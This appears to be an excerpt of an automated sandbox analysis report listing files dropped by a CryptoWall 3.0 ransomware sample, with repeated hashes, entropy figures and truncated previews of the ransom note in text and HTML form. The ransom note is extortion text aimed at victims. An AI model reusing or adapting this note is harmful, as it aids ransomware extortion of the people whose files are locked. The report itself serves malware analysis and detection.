                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):590
                                                                                                                          Entropy (8bit):6.700207039453219
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2OtYxrGXBevd560VjoHC4iIO1:c+z5U4a8OoDUX+S2OWvFRzIO1
                                                                                                                          MD5:7C83E63392508AAC66FE0E383D7DCE1C
                                                                                                                          SHA1:8128CCFE6C40DEEDA4B444DBA8759864AC40D6DA
                                                                                                                          SHA-256:87E28D7B9212B33D4F4E76B20028FFEC43D0859C3AA691B9BE4AC4A7F0AA9FA8
                                                                                                                          SHA-512:C2EA519A8B578D26C0FAADF42C3FC55B2DFF83314DB0AAE87F5F7F938B2DC713385D3DF73627A3613F60B7DF08DFE53595ABE1B9DE8538446EA45AAE3FD543CD
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1086
                                                                                                                          Entropy (8bit):7.488693678598227
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2CAAsmswIKi8nlM1kpMx7e8JSnMpsIr141dQ8:c+9U40oDgxAQ8alrpS7hJSosIS1dN
                                                                                                                          MD5:CF52B686D4DE13AD25F3525EA9A3E358
                                                                                                                          SHA1:05CE55497495AEEB3053C55A4CEEBE71CB6AFB8C
                                                                                                                          SHA-256:BE88E3D2BD8513AFD210D12F8FD6F9E89FB92E11A23FCD148E8E6E58073C4E93
                                                                                                                          SHA-512:78A16C35CC4BBBD374C8D66846AE3421FA06E985DEA5D14D2F40B481CAD3D8C0BEF8871C108D86A99D6A9ACD8944DB5A01A8E219E56A44AD1CACCD0F049DF5AD
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.380851703458764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2jhtrPk6aubiqSRc+RfvUOWmsz1mj:c+9U40oDgUfaub/+0Oqmj
                                                                                                                          MD5:05F94BAAE206FD34B044AABCABE99441
                                                                                                                          SHA1:68050D025B505319020E12DC1D9470AE7CC2F178
                                                                                                                          SHA-256:BCFF2B3EB1144A3007B84696C940A4AB441F5F063CDC73F4F30B1F7AC79D89A8
                                                                                                                          SHA-512:F3E1265B493FAAA34C32431BFFF99F81428F7E9BC8B2137932D42B0D9CC5F563F8CC3A5924A07C4DE58C71E5632656068C75409EA8854E045134CBCFDF005165
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.387367768699737
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S29A0ktlpQSYhpcw2v2byGGT8BimA:c+9U40oDgsTkLySYhSFv2bBa8B3A
                                                                                                                          MD5:89FF5C0CB9FD291991D6E6E93CE3555F
                                                                                                                          SHA1:39623AE94B632A6C10F8368888549B7891B050B2
                                                                                                                          SHA-256:60A49C41CC2650A024DF4E8DD295CF2C4AB285A2F4CF518CB4C65CE27BC7A5EA
                                                                                                                          SHA-512:0984D80150B557D24966BCAD0184A7299A96AD010AC3A732161EA3BF55270AD22D4D3F63205D785F2F15B4573B35C6A1BD719B8BA483BFEE87E422F3FF5B0841
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.473332774075749
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2uszlZSvQIyeY2QENraw2stMXo8Zx:c+9U40oDg9IIRQsawTkx
                                                                                                                          MD5:AA0B892421F843C22C0A3115BA165CFC
                                                                                                                          SHA1:CC196BEF1F5E6DF307D22797F5813E539FCB421A
                                                                                                                          SHA-256:1A276CF2A1900DB92DD97708F455B6A20F4B36FFE53788BFD0E6E52F63D12D57
                                                                                                                          SHA-512:BE2973607C8710302FFF86FC7CE1C81A47B67F1D54E1A7AE1ADFABBF25BB38A595B53BE9B63FB08CB687AB7B7B92012430F7909B49104C5E93793BC3E1E8A06F
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2430
                                                                                                                          Entropy (8bit):7.842174024715984
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgZyqGo7njjm6UmPEaMxnQaCxMxJ0/MfDsFJRkB8uqg1T:cztoD2yqGo7n3m6Um0QaCwGIDbqg1T
                                                                                                                          MD5:15C0913F0899166B573B11B6D45B353C
                                                                                                                          SHA1:1D04B656D6D782A88201A044F7EA732819D25FE4
                                                                                                                          SHA-256:84B1363506860BEAF0B99BB8C7B3E2A1BCFFDCBC24B0936795C6AD6D4C36A113
                                                                                                                          SHA-512:BB08F9086D087D224A86DF86EEE6210BEEA57930D8F849C3F7F0E6BAA80C6C1BDE6A23B68B8F70CF208BBB7EBD72895D7C05BD6B82E84E5583AA6BD98ECEE038
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
